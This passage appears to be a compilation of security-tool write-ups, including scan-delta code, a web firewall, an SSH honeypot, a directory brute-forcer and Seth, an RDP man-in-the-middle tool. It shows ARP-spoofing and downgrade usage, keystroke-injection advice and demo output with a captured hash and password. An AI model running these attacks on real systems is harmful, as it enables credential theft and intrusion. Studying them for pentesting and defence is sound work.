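    Finding("10.0.0.5", "443/tcp", "testssl:tls1.0", "offered (deprecated)"),
    Finding("10.0.0.5", "8080/tcp", "nmap:open", "http-proxy"),
]
SCAN_2 = [
    Finding("10.0.0.5", "22/tcp", "nmap:open", "OpenSSH 8.2"),                 # output changed
    Finding("10.0.0.5", "443/tcp", "testssl:tls1.0", "offered (deprecated)"),  # unchanged
    Finding("10.0.0.5", "3306/tcp", "nmap:open", "mysql"),                     # new
]                                                                               # 8080/tcp gone

if __name__ == "__main__":
    for status, findings in delta(SCAN_1, SCAN_2).items():
        print(status, [f"{f.port} {f.plugin}" for f in findings])
```

Keying on (host, port, plugin) rather than on the output text is what makes a changed banner show up as "changed" instead of as one finding gone and a new one appearing; "gone" findings are still worth listing, since a port that silently closed can be a host that is no longer being scanned at all.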

Seccubus V2 works with the following scanners:
  • Nessus
  • OpenVAS
  • Skipfish
  • Medusa (local and remote)
  • Nikto (local and remote)
  • NMap (local and remote)
  • OWASP-ZAP (local and remote)
  • SSLyze
  • Medusa
  • Qualys SSL labs
  • testssl.sh (local and remote)
For more information visit [www.seccubus.com]

Default password: change it!
After installation the default username and password for Seccubus are:
admin / GiveMeVulns!
It is highly recommended that you change this right after installation:
/bin/seccubus_passwd -u admin

Change log
Changes of this branch vs the latest/previous release

x-x-2019 - v2.53 Development release
This is work in progress
Differences with 2.52



Terminus - A Terminal For A More Modern Age


Terminus is a highly configurable terminal emulator for Windows, macOS and Linux
  • Theming and color schemes
  • Fully configurable shortcuts
  • Split panes
  • Remembers your tabs
  • PowerShell (and PS Core), WSL, Git-Bash, Cygwin, Cmder and CMD support
  • Integrated SSH client and connection manager
  • Full Unicode support including double-width characters
  • Doesn't choke on fast-flowing outputs
  • Proper shell experience on Windows including tab completion (via Clink)

  • Terminus is an alternative to Windows' standard terminal (conhost), PowerShell ISE, PuTTY or iTerm
  • Terminus is not a new shell or a MinGW or Cygwin replacement. Neither is it lightweight - if RAM usage is of importance, consider Conemu or Alacritty

Plugins
Plugins and themes can be installed directly from the Settings view inside Terminus.
  • clickable-links - makes paths and URLs in the terminal clickable
  • shell-selector - a quick shell selector pane
  • title-control - allows modifying the title of the terminal tabs by providing a prefix, suffix, and/or strings to be removed
  • quick-cmds - quickly send commands to one or all terminal tabs
  • save-output - record terminal output into a file
  • scrollbar - adds a scrollbar to hterm tabs

Themes



Quarantyne - Modern Web Firewall: Stop Account Takeovers, Weak Passwords, Cloud IPs, DoS Attacks, Disposable Emails


Automated web security made simple
Quarantyne is a reverse-proxy that protects web applications and APIs from fraudulent behavior, misuse, bots and cyber-attacks in real-time.

Requirements
  • Java 8

Presentation
Quarantyne is a reverse proxy written in Java. It fronts a web application or API and protects it from fraudulent behaviour, misuse, bots and cyber-attacks. It cannot stop them all, but it will definitely make them harder and more expensive to perform.
It's like a firewall, but smarter, because it does not just block traffic because the user agent is not in a whitelist. Quarantyne also performs deep request inspection to detect, for example, whether the password used has been compromised before or whether the email address is disposable, with minimal configuration and no changes to your application. The coverage section lists precisely what Quarantyne can identify.

Features

Wide coverage of common HTTP threats and misuse
See coverage for a complete list of the threats and misuse Quarantyne can identify and stop.

Deep traffic analysis
Quarantyne performs deep inspection of web traffic going to your application to verify that the data being sent is not compromised or junk.

Generic integration
Quarantyne adds extra HTTP headers to the request it proxies to your service. For example, an HTTP request coming from AWS will bear the following headers:
  • X-Quarantyne-Labels: PCX
  • X-Quarantyne-RequestId: 08a0e31a-f1a5-4660-9316-0fdf5d2a959d

Active protection
Quarantyne can be configured to stop malicious requests from reaching your servers, avoiding wasted compute/DB/cache resources, skewed metrics, junk data... See Passive vs. Active below.

Metrics & health reporting
Quarantyne binds to an internal adminPort, where metrics (latencies, success rate...) as well as the health of the proxy are reported.

Privacy friendly / GDPR compliance
Quarantyne is offline software. It runs inside your private network and does not communicate over the Internet with anyone to share data about your traffic, your business, or your users.

Ops Friendly.
Single jar with 0 dependencies. Metrics are available on [proxyHost]:[adminPort]/metrics. Service health is available on [proxyHost]:[adminPort]/health

Coverage
Quarantyne is able to detect the following threats and misuse.
Label  Definition                  Behaviour                                                                              Implemented
LBD    Large Body Data             Overload the target's form processor with a POST/PUT request whose body is > 1 MB       yes
FAS    Fast Browsing               Request rate faster than regular human browsing                                        yes
CPW    Compromised Password        Password used is known from a previous data breach. Possible account takeover          yes
DMX    Disposable Email            Email used belongs to a disposable email service                                       yes
IPR    IP Address Rotation         Same visitor is rotating its IP addresses                                              no
SHD    Suspicious Request Headers  Abnormal HTTP request headers                                                          yes
SUA    Suspicious User-Agent       User agent not from a regular web browser                                              yes
PCX    Public Cloud Execution      IP address belongs to a public cloud service like AWS or GCP                           no
IPD    IP/Country Discrepancy      Country inferred from the visitor IP differs from the country field in the request     no
SGE    Suspicious Geolocation      This request is not usually received from this geolocation. Possible account takeover  no

Passive vs. Active

Passive mode
Quarantyne lets you decide how to handle the requests it flags. Quarantyne's default configuration is NOT to block tainted traffic: such traffic reaches your server, labelled as tainted via HTTP headers.
Passive mode is the recommended way to get familiar with Quarantyne and to get a sense of what is going on inside your web traffic. In your application, log or plot the incoming Quarantyne labels and you might be surprised (or not) by what you find!

Active Mode
In active mode, Quarantyne prevents tainted traffic from reaching your application. Blocking happens only if you explicitly configure Quarantyne to do so. The configuration section explains how traffic blocking can be enabled.

Configuration
Two complementary configuration systems are used: command-line arguments and an external (local or remote) JSON configuration file.

Command-line arguments
Run the following command to display the help and what arguments are available
$ java -jar quarantyne.jar -h
Usage: <main class> [options]
Options:
--admin
internal ip:port where to access admin, UI and metrics. Optional
--config-file
Optional URL or local path to a Quarantyne JSON configuration file
--egress
HTTP destination where Quarantyne forwards annotated web traffic.
Default: http://httpbin.org
--help, -help, --h, -h
Display help about available configuration arguments
Default: false
--ingress
ip:port of inbound web traffic.
Default: 0.0.0.0:8080
--config-file points at an optional JSON configuration file that tells Quarantyne how requests to your service are structured. It enables deep traffic analysis and increases coverage.

Traffic config JSON file
The traffic config file is optional and can either be an absolute local path or a remote HTTP(S) URL to a JSON file containing a single JSON object with the following structure. Describing the structure of your HTTP requests helps Quarantyne perform deep inspection of critical data such as password, emails or countries.
{
"login_action": {
"path": "/anything",
"identifier_param": "email",
"secret_param": "password"
},
"register_action": {
"path": "/anything",
"identifier_param": "email",
"secret_param": "password"
},
"email_param_keys": ["email", "contact[email]"],
"country_iso_code_param_keys": ["country_code"],
"blocked_request_page": "https://raw.githubusercontent.com/AndiDittrich/HttpErrorPages/master/dist/HTTP500.html",
"blocked_classes": ["all"]
}
Quarantyne is able to parse payloads submitted via POST/PUT with a Content-Type of application/json or application/x-www-form-urlencoded.
Root properties are optional.
Property | Definition | Notes
*_action | A POST/PUT data payload | login_action describes the data structure sent when logging in. register_action defines the data structure sent when registering / creating an account.
*_action.path | Path where data is submitted | Must start with /
*_action.identifier_param | Form/JSON key name where the user identifier is sent |
*_action.secret_param | Form/JSON key where the user password is sent |
email_param_keys | Form/JSON keys where email addresses are sent |
country_iso_code_param_keys | Form/JSON keys where country ISO codes are sent |
blocked_request_page | HTTP response to return when blocking a request | It's better when this looks like a legitimate page/error so as not to tip off the attacker. Even better if you can inject fake data :)
blocked_classes | An array of attack classes to block | [] is equivalent to passive mode. ["all"] stops every class of attack Quarantyne can detect. See coverage.
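Added example, not Quarantyne's own code: what the traffic config file lets a proxy locate in a request, and the passive/active distinction it encodes. The functions load a config with the documented structure, check the documented rules (action paths start with /, the *_keys and blocked_classes properties are arrays, an empty or absent blocked_classes means passive), and, for a POST/PUT carrying one of the two Content-Types the page names, pull out the identifier, secret, email and country values that the *_action and *_param_keys entries point at. The config and requests are constructed; the paths /login and /register are assumptions (the page's sample uses httpbin's /anything).

```python
"""Validate a Quarantyne traffic config and show what it lets a proxy find (added example)."""
import json
from urllib.parse import parse_qs

# Constructed config in the documented shape; paths are assumptions.
SAMPLE_CONFIG = json.loads("""
{
  "login_action":    {"path": "/login",    "identifier_param": "email", "secret_param": "password"},
  "register_action": {"path": "/register", "identifier_param": "email", "secret_param": "password"},
  "email_param_keys": ["email", "contact[email]"],
  "country_iso_code_param_keys": ["country_code"],
  "blocked_request_page": "https://example.invalid/500.html",
  "blocked_classes": []
}
""")

KNOWN_KEYS = {"login_action", "register_action", "email_param_keys",
              "country_iso_code_param_keys", "blocked_request_page", "blocked_classes"}


def validate(cfg):
    """Return the list of rule violations; an empty list means the config is usable."""
    problems = [f"unknown root property {k!r}" for k in cfg if k not in KNOWN_KEYS]
    for name in ("login_action", "register_action"):
        action = cfg.get(name)
        if action is None:
            continue                                   # root properties are optional
        if not str(action.get("path", "")).startswith("/"):
            problems.append(f"{name}.path must start with /")
        for sub in ("identifier_param", "secret_param"):
            if not action.get(sub):
                problems.append(f"{name}.{sub} is missing")
    for name in ("email_param_keys", "country_iso_code_param_keys", "blocked_classes"):
        if name in cfg and not isinstance(cfg[name], list):
            problems.append(f"{name} must be an array")
    return problems


def mode(cfg):
    """blocked_classes [] or absent -> passive (label only); anything listed -> active."""
    return "active" if cfg.get("blocked_classes") else "passive"


def parse_body(content_type, body):
    """Flatten the two encodings the page says are parsed into a {key: value} dict."""
    ct = content_type.split(";")[0].strip().lower()
    if ct == "application/json":
        data = json.loads(body)
        return {k: str(v) for k, v in data.items()} if isinstance(data, dict) else {}
    if ct == "application/x-www-form-urlencoded":
        return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {}                                          # other types: no deep inspection


def inspect(cfg, method, path, content_type, body):
    """Return the critical fields the config lets a proxy find in one request."""
    found = {}
    if method not in ("POST", "PUT"):
        return found
    fields = parse_body(content_type, body)
    for name in ("login_action", "register_action"):
        action = cfg.get(name)
        if action and action["path"] == path:
            found["action"] = name
            if action["identifier_param"] in fields:
                found["identifier"] = fields[action["identifier_param"]]
            found["secret_present"] = action["secret_param"] in fields
    emails = [fields[k] for k in cfg.get("email_param_keys", []) if k in fields]
    if emails:
        found["emails"] = emails
    for key in cfg.get("country_iso_code_param_keys", []):
        if key in fields:
            found["country"] = fields[key]
    return found


if __name__ == "__main__":
    print(mode(SAMPLE_CONFIG), validate(SAMPLE_CONFIG))
    print(inspect(SAMPLE_CONFIG, "POST", "/login", "application/x-www-form-urlencoded",
                  "email=alice%40example.com&password=hunter2&country_code=FR"))
```

Run `validate` on your own file before pointing --config-file at it; a path missing its leading slash silently turns off the deep inspection for that action, which is easy to miss in passive mode where nothing is blocked anyway.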

Quick run

Hosted demo
Available at https://demo.quarantyne.com/. In this scenario, Quarantyne is fronting httpbin.org in passive mode. Threats and misuse sent will be flagged via HTTP headers so querying https://demo.quarantyne.com/headers or https://demo.quarantyne.com/anything is a good start to see what's going on. Hint: start simple, start with curl.

Run the jar
Quarantyne ships as a single zero-dependency executable jar. Download a release and run:
$ java -jar quarantyne.jar

Build from source
Clone this repo and run the following
$ ./gradlew run
You should see the following:
"2018-11-28T22:25:17.152-0800" [main] INFO com.quarantyne.proxy.Main - 0.0.0.0:8080 <= quarantyne => http://httpbin.org:80
"2018-11-28T22:25:17.223-0800" [main] INFO com.quarantyne.proxy.Main - see available options with --help
"2018-11-28T22:25:17.234-0800" [main] DEBUG com.quarantyne.proxy.Main - ==> event loop size is 8
"2018-11-28T22:25:17.234-0800" [main] DEBUG com.quarantyne.proxy.Main - ==> detected 4 cpus core
"2018-11-28T22:25:17.496-0800" [main] INFO com.quarantyne.config.ConfigRetrieverOptionsSupplier - remote configuration file found at https://s3-us-west-2.amazonaws.com/releases.quarantyne.com/quarantyne.test.json
You are all set! By default, Quarantyne listens on 0.0.0.0:8080 and proxies traffic to http://httpbin.org.
Send a few requests to http://127.0.0.1:8080/headers via various means. If fraudulent behavior is detected, you should see X-Quarantyne-Label HTTP headers in the request received by your application. Hint: try with curl.

Distributions

Heroku Buildpack
https://github.com/quarantyne/heroku-buildpack-quarantyne

Docker image
Coming soon

Mailing List
https://groups.google.com/forum/#!forum/quarantyne-users

License
Apache 2



Prithvi - Report Generation Tool


Prithvi is a free, easy-to-use report generation tool made specifically for security assessments. It generates high-quality vulnerability assessment reports for security controls, and its features are geared towards assessment work, so the security vulnerabilities found are easy to locate in the report.

System Requirements
Operating Systems: Mac OSX (64-bit), Windows (64-bit & 32-bit)
RAM: Minimum 4GB of available memory
Storage: 10GB of available disk space

Advantages of Prithvi

Prithvi is used to generate security assessment reports and can be modified to suit your requirements, so it can also be used for other kinds of report generation.

It includes the following features
  •     We can add multiple projects and add vulnerabilities in each project.
  •     We can add the number of occurrences with proof of concept.
  •     To track the ongoing projects, we can also add tracking data for better understanding.
  •     We can generate the project report as well as the tracking report.
  •     Provides OWASP data (vulnerabilities, details and recommendations) for the vulnerabilities you add.
  •     Includes both the OWASP web and mobile data sets (2017 edition).
  •     Prithvi is easy to use.
  •     Prithvi is free to use.
  •     Prithvi is available in Windows as well as the Mac version.

How to use Prithvi

  •     Start the application.
  •     Add a new project and fill in the details.
  •     Add vulnerabilities to the project and fill in their details.
  •     Right-click your project in Prithvi and click generate the report.
  •     If you need a tracking report, click on the tracking tab.
  •     Add the tracking details and save them.
  •     Now click report in the menu and click generate tracking report in the submenu.
  •     After clicking the tracking report, provide the necessary details like project and date, and click on the search button.
  •     Then click generate the report in the right corner.

Sample Reports for Prithvi

A sample cyber security risk assessment report generated using Prithvi.



Kippo - SSH Honeypot


Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
Kippo is inspired by, but not based on, Kojoney.

Features
Some interesting features:
  • Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
  • Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
  • Session logs stored in a UML-compatible format for easy replay with original timings
  • Just like Kojoney, Kippo saves files downloaded with wget for later inspection
  • Trickery; ssh pretends to connect somewhere, exit doesn't really exit, etc

Requirements
Software required:
  • An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
  • Python 2.5+
  • Twisted 8.0 to 15.1.0
  • PyCrypto
  • Zope Interface
See Wiki for some installation instructions.

How to run it?
Edit kippo.cfg to your liking and start the honeypot by running:
./start.sh
start.sh is a simple shell script that runs Kippo in the background using twistd. Detailed startup options can be given by running twistd manually. For example, to run Kippo in foreground:
twistd -y kippo.tac -n
By default Kippo listens for ssh connections on port 2222. You can change this, but do not change it to 22 as it requires root privileges. Use port forwarding instead. (More info: MakingKippoReachable).
Files of interest:
  • dl/ - files downloaded with wget are stored here
  • log/kippo.log - log/debug output
  • log/tty/ - session logs
  • utils/playlog.py - utility to replay session logs
  • utils/createfs.py - used to create fs.pickle
  • fs.pickle - fake filesystem
  • honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here

Is it secure?
Maybe. See FAQ



Konan - Advanced Web Application Dir Scanner


Konan is an advanced open source tool designed to brute force directories and files names on web/application servers.

Installation
Download Konan by cloning the Git repository:
git clone https://github.com/m4ll0k/Konan.git konan
Install requirements with pip
cd konan && pip install -r requirements.txt
Run Konan
python konan.py

Support Platforms
  • Linux
  • Windows
  • MacOSX

Features
Feature | Konan | dirsearch | dirb | gobuster
Multithreaded | yes | yes | yes | yes
Multiple extensions | yes | yes | no | no
HTTP proxy support | yes | yes | yes | yes
Reporting | yes (text and json) | yes (text and json) | yes (text) | no
User-Agent randomization | yes | yes | no | no
Ignore word in wordlist using regexp | yes | no | no | no
Split extension in wordlist | yes | no | no | no
Multiple methods | yes | no | no | no
Response size processing | yes | no | no | no
Provide sub-dir for brute force | yes | no | no | no
Provide dir for recursive brute force | yes | no | no | no
URL injection point | yes | no | no | no

Usage
Basic:
  • python konan.py -u/--url http://example.com/
URL: http://testphp.vulnweb.com/

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/index.php
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/search.php
0.54% - 01:32:57 - 200 - GET - 5523 - http://testphp.vulnweb.com/login.php
0.81% - 01:33:12 - 200 - GET - 4830 - http://testphp.vulnweb.com/logout.php
8.77% - 01:40:02 - 302 - GET - 14 - http://testphp.vulnweb.com/userinfo.php -> login.php
Injection Point:
  • python konan.py -u/--url http://example.com/%%/index.php
URL: http://testphp.vulnweb.com/%%/index.php

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/test/index.php
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/search/index.php
  • python konan.py -u/--url http://example.com/test%% -w /root/numbers.txt
URL: http://testphp.vulnweb.com/test%%

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 01:32:50 - 200 - GET - 4958 - http://testphp.vulnweb.com/test12
0.43% - 01:32:52 - 200 - GET - 4732 - http://testphp.vulnweb.com/test34
Provide wordlist, default /db/dict.txt:
  • python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt
Provide extensions with -f/--force option:
  • python konan.py -u/--url http://example.com/ -e/--extension php,html -f/--force
URL: http://testphp.vulnweb.com/

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 02:00:21 - 200 - GET - 4958 - http://testphp.vulnweb.com/index.html
0.43% - 02:00:23 - 200 - GET - 4732 - http://testphp.vulnweb.com/search.php
0.54% - 02:00:30 - 200 - GET - 5523 - http://testphp.vulnweb.com/login.php
0.81% - 02:00:46 - 200 - GET - 4830 - http://testphp.vulnweb.com/logout.html
0.87% - 02:00:50 - 200 - GET - 6115 - http://testphp.vulnweb.com/categories.html
Provide status code exclusion:
  • python konan.py -u/--url http://example.com/ -x/--exclude 400,403,401
Provide only status code for output:
  • python konan.py -u/--url http://example.com/ -o/--only 200,301,302
Wordlist lowercase (isATest -> isatest) and uppercase (isAtest -> ISATEST):
  • python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt [-l/--lowercase OR -p/--uppercase]
Wordlist split (test.php -> to -> test):
  • python konan.py -u/--url http://example.com/ -w/--wordlist /root/dict.txt -s/--split
Ignore words, letters, numbers, etc. in the wordlist by regexp (e.g. \w*.php|\w*.html or ^[0-9_-]+):
  • python konan.py -u/--url http://example.com/ -w/--wordlist -I/--ignore "\?+"
Output without -I/--ignore options:
URL: http://testphp.vulnweb.com/

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.39% - 02:06:31 - 200 - GET - 4958 - http://testphp.vulnweb.com/???.php
0.43% - 02:06:32 - 200 - GET - 4732 - http://testphp.vulnweb.com/???????????
0.54% - 02:06:35 - 200 - GET - 5523 - http://testphp.vulnweb.com/admin/
Output with -I/--ignore (in this case \?+) options:
 URL: http://testphp.vulnweb.com/

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.54% - 02:06:35 - 200 - GET - 5523 - http://testphp.vulnweb.com/admin/
Recursive:
  • python konan.py -u/--url http://example.com/ -E/--recursive
Recursive directory found and directory provided by -D/--dir-rec:
  • python konan.py -u/--url http://example.com/ -E/--recursive -D/--dir-rec "admin,tests,dev,internal"
Brute Force directory provided by -S/--sub-dir:
  • python konan.py -u/--url http://example.com/ -S/--sub-dir "admin,test,internal,dev"
Multiple Methods (check GET,POST,PUT and DELETE for word entry):
Note: many web applications return a 404 unless the request is made with the right method; this option tests all of them.
  • python konan.py -u/--url http://example.com/ -m/--methods
Content size process (show response if the response size is ">[number]","<[number]","=[number]"):
  • python konan.py -u/--url http://example.com/ -C/--lenght "<1000"
URL: http://testphp.vulnweb.com/

PERCENT - TIME - CODE - METHOD - LENGHT - URL
-------------------------------------------------------
0.19% - 02:11:46 - 301 - GET - 184 - http://testphp.vulnweb.com/admin -> http://testphp.vulnweb.com/admin/
1.73% - 02:12:37 - 301 - GET - 184 - http://testphp.vulnweb.com/images -> http://testphp.vulnweb.com/images/
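Added example, not Konan's own code: the candidate generation and output filtering that the options in this Usage section describe, done offline so you can see which requests a scan would send before sending any. It covers the -l/-p case folding, the -s split, the -I regexp ignore, the %% injection point, and the -o/-x/-C output filters. Option meanings are taken from the page; where the page is silent (for instance the order in which the wordlist transforms apply) the choice here is an assumption. WORDLIST and SAMPLE_RESULTS are constructed for this example.

```python
"""Offline model of Konan's wordlist transforms, injection point and result filters (added example)."""
import re
from typing import Callable, Iterable, List, Optional, Tuple

# Constructed wordlist with entries that exercise each transform.
WORDLIST = ["index.php", "???.php", "Admin", "isATest", "search", "12", "34", "logout.html"]


def transform(words: Iterable[str], lowercase: bool = False, uppercase: bool = False,
              split: bool = False, ignore: Optional[str] = None) -> List[str]:
    """Apply -I, then -s, then -l/-p (order is an assumption); duplicates are dropped."""
    pattern = re.compile(ignore) if ignore else None
    out: List[str] = []
    for word in words:
        if pattern and pattern.search(word):      # -I: entries matching the regexp are skipped
            continue
        if split and "." in word:                 # -s: test.php -> test
            word = word.rsplit(".", 1)[0]
        if lowercase:                             # -l: isATest -> isatest
            word = word.lower()
        elif uppercase:                           # -p: isAtest -> ISATEST
            word = word.upper()
        if word not in out:
            out.append(word)
    return out


def build_urls(base: str, words: Iterable[str]) -> List[str]:
    """%% marks where the word goes; without it the word is appended to the base path."""
    if "%%" in base:
        return [base.replace("%%", w, 1) for w in words]
    return [base.rstrip("/") + "/" + w for w in words]


_LEN_EXPR = re.compile(r"^\s*([<>=])\s*(\d+)\s*$")


def length_filter(expr: Optional[str]) -> Callable[[int], bool]:
    """Turn a -C expression such as '<1000' into a predicate over the response length."""
    if expr is None:
        return lambda n: True
    m = _LEN_EXPR.match(expr)
    if not m:
        raise ValueError(f"bad length expression {expr!r}")
    op, n = m.group(1), int(m.group(2))
    return {"<": lambda x: x < n, ">": lambda x: x > n, "=": lambda x: x == n}[op]


Result = Tuple[int, int, str]   # (status code, response length, url)


def filter_results(results: Iterable[Result], only: Iterable[int] = (),
                   exclude: Iterable[int] = (), length: Optional[str] = None) -> List[Result]:
    """-o keeps only the listed codes, -x drops the listed codes, -C filters on length."""
    only, exclude, keep = set(only), set(exclude), length_filter(length)
    return [(code, size, url) for code, size, url in results
            if (not only or code in only) and code not in exclude and keep(size)]


# Constructed from the shape of the page's sample output lines.
SAMPLE_RESULTS: List[Result] = [
    (200, 4958, "http://testphp.vulnweb.com/index.php"),
    (302, 14, "http://testphp.vulnweb.com/userinfo.php"),
    (301, 184, "http://testphp.vulnweb.com/admin"),
    (403, 1023, "http://testphp.vulnweb.com/secret"),
]


if __name__ == "__main__":
    for url in build_urls("http://testphp.vulnweb.com/%%/index.php",
                          transform(WORDLIST, split=True, lowercase=True, ignore=r"\?+")):
        print(url)
    print(filter_results(SAMPLE_RESULTS, exclude=[400, 401, 403], length="<1000"))
```

The -I regexp is applied to the raw wordlist entry before any splitting, which is why `\?+` removes the `???.php` junk in the page's example; combine -s with -e if you want the stripped stems re-extended rather than requested bare.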



Seth - Perform A MitM Attack And Extract Clear Text Credentials From RDP Connections


Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).

Usage
Run it like this:
$ ./seth.sh <INTERFACE> <ATTACKER IP> <VICTIM IP> <GATEWAY IP|HOST IP> [<COMMAND>]
Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.
The last parameter is optional. It can contain a command that is executed on the RDP host by simulating WIN+R via key press event injection. Keystroke injection depends on which keyboard layout the victim is using - currently it's only reliable with the English US layout. I suggest avoiding special characters by using powershell -enc <STRING>, where STRING is your UTF-16le and Base64 encoded command. However, calc should be pretty universal and gets the job done.
The shell script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic so that it runs through an RDP proxy. The proxy can also be called separately, which is useful if you want to use Seth in combination with Responder: use Responder to gain the Man-in-the-Middle position and run Seth at the same time. Run seth.py -h for more information:
usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]
[-j INJECT] -c CERTFILE -k KEYFILE
target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
target_host target host of the RDP service
target_port TCP port of the target RDP service (default 3389)

optional arguments:
-h, --help show this help message and exit
-d, --debug show debug information
-f, --fake-server perform a 'fake server' attack
-p LISTEN_PORT, --listen-port LISTEN_PORT
TCP port to listen on (default 3389)
-b BIND_IP, --bind-ip BIND_IP
IP address to bind the fake service to (default all)
-g {0,1,3,11}, --downgrade {0,1,3,11}
downgrade the authentication protocol to this (default
3)
-j INJECT, --inject INJECT
command to execute via key press event injection
-c CERTFILE, --certfile CERTFILE
path to the certificate file
-k KEYFILE, --keyfile KEYFILE
path to the key file
For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.
You can also watch a twenty minute presentation including a demo (starting at 14:00) on Youtube: https://www.youtube.com/watch?v=wdPkY7gykf4
Or watch just the demo (with subtitles) here: https://www.youtube.com/watch?v=JvvxTNrKV-s

Demo
The following output shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning.

# ./seth.sh eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ seth@vollmer.syss.de
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is 192.168.57.102
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Listening for new connection
Connection received from 192.168.57.103:50431
Downgrading authentication options from 11 to 3
Enable SSL
alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:...
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Connection lost
Connection received from 192.168.57.103:50409
Listening for new connection
Enable SSL
Connection lost
Connection received from 192.168.57.103:50410
Listening for new connection
Enable SSL
Hiding forged protocol request from client
.\alice:ilovebob
Keyboard Layout: 0x409 (English_United_States)
Key press: LShift
Key press: S
Key release: S
Key release: LShift
Key press: E
Key release: E
Key press: C
Key release: C
Key press: R
Key release: R
Key press: E
Key release: E
Key press: T
Key release: T
Connection lost
[*] Cleaning up...
[*] Done.
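Added example, not Seth's own code: the RDP negotiation bytes that the downgrade described above rewrites, and why enforcing NLA on the server defeats it. A client opens RDP with an X.224 Connection Request carrying an RDP_NEG_REQ whose requestedProtocols bitmask is what Seth's -g option lowers (11 to 3 in the demo output, and further to plain TLS when CredSSP is dropped). The functions build such a request, rewrite the bitmask the way a proxy in the middle would, and model the server-side decision from MS-RDPBCGR: a server configured to require NLA answers a request lacking PROTOCOL_HYBRID with RDP_NEG_FAILURE(HYBRID_REQUIRED_BY_SERVER) instead of continuing, so the victim never gets to type a password into a TLS session the proxy terminates. The cookie, packets and server model are constructed; no network traffic is involved.

```python
"""RDP protocol negotiation: build, downgrade and decide (added example, offline)."""
import struct

# requestedProtocols / selectedProtocol bits (MS-RDPBCGR 2.2.1.1.1 / 2.2.1.2.1)
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0, 1, 2, 8
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 1, 2, 3
HYBRID_REQUIRED_BY_SERVER = 5


def build_connection_request(protocols: int, user: str = "alice") -> bytes:
    """TPKT + X.224 Connection Request + routing cookie + RDP_NEG_REQ(requestedProtocols)."""
    cookie = f"Cookie: mstshash={user}\r\n".encode()            # constructed cookie
    neg = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, protocols)
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + cookie + neg   # CR code, dst-ref, src-ref, class
    x224 = bytes([len(x224)]) + x224                            # length indicator
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224      # TPKT version 3 header


def parse_requested_protocols(pkt: bytes) -> int:
    """Validate the TPKT/X.224 framing and return the RDP_NEG_REQ requestedProtocols."""
    version, _, total = struct.unpack(">BBH", pkt[:4])
    if version != 3 or total != len(pkt):
        raise ValueError("not a TPKT packet")
    li = pkt[4]
    if pkt[5] != 0xE0 or li + 5 != len(pkt):
        raise ValueError("not an X.224 Connection Request")
    typ, _, length, protocols = struct.unpack("<BBHI", pkt[-8:])
    if typ != TYPE_RDP_NEG_REQ or length != 8:
        raise ValueError("no RDP_NEG_REQ present")
    return protocols


def downgrade(pkt: bytes, to: int) -> bytes:
    """What a MitM does: keep the request intact, overwrite the 4-byte requestedProtocols."""
    parse_requested_protocols(pkt)                # refuse to touch anything else
    return pkt[:-4] + struct.pack("<I", to)


def server_decision(requested: int, nla_required: bool) -> tuple:
    """Simplified model of the server's RDP_NEG_RSP / RDP_NEG_FAILURE choice."""
    if requested & PROTOCOL_HYBRID:
        return (TYPE_RDP_NEG_RSP, PROTOCOL_HYBRID)          # NLA (CredSSP) negotiated
    if nla_required:
        return (TYPE_RDP_NEG_FAILURE, HYBRID_REQUIRED_BY_SERVER)
    if requested & PROTOCOL_SSL:
        return (TYPE_RDP_NEG_RSP, PROTOCOL_SSL)             # TLS only: password typed in-session
    return (TYPE_RDP_NEG_RSP, PROTOCOL_RDP)                 # standard RDP security


if __name__ == "__main__":
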